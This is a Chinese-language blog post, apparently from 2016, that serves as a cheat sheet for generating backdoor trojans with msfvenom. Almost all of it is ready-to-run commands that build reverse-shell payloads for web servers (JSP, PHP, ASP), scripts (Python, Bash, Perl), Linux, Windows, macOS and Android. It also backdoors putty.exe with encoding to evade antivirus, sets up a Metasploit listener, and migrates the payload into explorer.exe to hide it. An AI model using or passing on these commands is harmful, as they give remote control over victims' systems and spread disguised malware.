Update avaliable. Click RELOAD to update.
目录

使用msfvenom生成多平台后门木马

1. 介绍说明

msfvenommetasploit中一款用于生成木马的工具,支持多种平台和语言。需要结合metasploit的反向连接使用。

2. 木马生成

2.1 Web端反弹木马

[ jsp木马 ]

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.15 LPORT=43221 -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.15 LPORT=43221 -f war > shell.war

[ php木马 ]

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.84 LPORT=43221 -f raw > shell.php

[ asp木马 ]

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.84 LPORT=43221 -f asp > shell.asp

Web端的反弹木马上传至目标服务器中,使用浏览器打开木马路径后触发运行。

2.2 Script反弹木马

[ python木马 ]

msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.84 LPORT=43221 -f raw > shell.py

[ shell木马 ]

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.84 LPORT=43221 -f raw > shell.sh

[ perl木马 ]

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.84 LPORT=43221 -f raw > shell.pl

所有脚本木马运行前需要加上运行权限,如chmod u+x shell.py,若需要后台运行,则需要加&号,如./shell.sh &

2.3 System反弹木马

[ linux木马 ]

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=43221 -f elf > shell.elf

[ windows木马 ]

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=43221 -f exe > shell.exe
msfvenom –p cmd/windows/reverse_powershell lhost=192.168.1.15 lport=43221  > file.bat
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=43221 -a x86 --platform windows -x putty.exe -k -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe > puttyX.exe

[ macosx木马 ] (不可用)

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.84 LPORT=43221 -f macho > shell.macho

[ android木马 ]

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.84 lport=43221 R > system.apk

3. 反向连接服务

use exploit/multi/handler
set payload [对应生成的payload]
set lhost 192.168.1.15
set lport 43221
exploit

附录A 额外的选项列表

msfvenom 支持的攻击载荷有很多,可以使用命令msfvenom -l payloads列出,若希望查看某个具体的 payload 参数,可以使用msfvenom --payload windows/download_exec --payload-options 查看。

附录B Prepend Migrate隐藏合并进程

在进入meterpreter时,会使用migrate合并进程存储空间,使用msfvenom生成木马时就可以使用 Prepend Migrate 进行预订合并操作。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=43221 prependmigrate=true prepenmigrateprocess=explorer.exe -f exe > shell.exe
版权所有,本作品采用知识共享署名-非商业性使用 3.0 未本地化版本许可协议进行许可。转载请注明出处:https://www.wangjun.dev//2016/04/metasploit-generate-backdoor/

Related posts